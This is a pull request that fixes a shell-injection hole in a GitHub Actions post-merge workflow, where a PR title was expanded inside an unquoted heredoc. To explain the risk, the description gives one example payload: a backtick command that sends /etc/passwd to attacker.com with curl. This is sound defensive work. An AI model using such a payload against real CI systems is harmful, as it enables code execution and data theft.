### PR TITLE
fix(ci): prevent shell injection via PR title in build verification

### DIFF
--- a/.github/workflows/pr-closed-verification.yml
+++ b/.github/workflows/pr-closed-verification.yml
@@ -186,11 +186,14 @@ jobs:
         run: |
           CHANGED_FILES=$(cat /tmp/changed-files.txt)
 
-          gh issue create \
-            --repo "${{ github.repository }}" \
-            --title "$(printf '\xF0\x9F\x90\x9B') Build broken after merging PR #${PR_NUMBER}" \
-            --label "kind/bug,priority/critical" \
-            --body "$(cat <<EOF
+          # Write body to temp file to prevent shell injection via PR_TITLE.
+          # The heredoc uses a quoted delimiter ('BODYEOF') so that ${PR_TITLE}
+          # and other variables are NOT expanded inside it — they are written
+          # literally into /tmp/issue-body.txt.  We then read the file with
+          # envsubst (which only substitutes exported env vars, not backticks
+          # or $(...) constructs) to produce the final body for the issue.
+          export PR_NUMBER PR_TITLE PR_URL PR_AUTHOR MERGE_SHA
+          cat >/tmp/issue-body.txt <<'BODYEOF'
           ## Build Broken After Merge
 
           The post-merge build verification detected a **build failure** after merging PR #${PR_NUMBER}.
@@ -225,8 +228,13 @@ jobs:
 
           ---
           *This issue was automatically created by the post-merge build verification workflow.*
-          EOF
-          )"
+          BODYEOF
+          envsubst < /tmp/issue-body.txt > /tmp/issue-body-final.txt
+          gh issue create \
+            --repo "${{ github.repository }}" \
+            --title "$(printf '\xF0\x9F\x90\x9B') Build broken after merging PR #${PR_NUMBER}" \
+            --label "kind/bug,priority/critical" \
+            --body-file /tmp/issue-body-final.txt
 
       - name: Comment on PR — verification passed
         if: >-


### PR DESCRIPTION
## Problem

The `PR_TITLE` variable (from `github.event.pull_request.title`) was interpolated inside an unquoted heredoc (`$(cat <<EOF ... EOF)`) used as the `--body` argument to `gh issue create`.

Since unquoted heredocs expand shell variables and **command substitutions**, a malicious PR title containing backticks (e.g., `` `curl attacker.com/exfil?t=$(cat /etc/passwd)` ``) would execute arbitrary commands on the CI runner.

## Fix

1. **Quoted heredoc (`'BODYEOF'`)** — writes the template literally to `/tmp/issue-body.txt` without expanding any shell constructs.
2. **envsubst** — then reads that file and substitutes only **exported environment variables** (`$PR_NUMBER`, `$PR_TITLE`, etc.), never backtick or `$(...)` constructs.
3. **`--body-file`** — passes the sanitized body via file instead of inline, eliminating the command-substitution wrapper entirely.

## Verification

- The quoted heredoc delimiter (`<<'BODYEOF'`) ensures shell does NOT process the content
- `envsubst` only substitutes `${VAR}` references, not backticks or `$()` 
- No change to the output format — the issue body is identical

Closes: #13714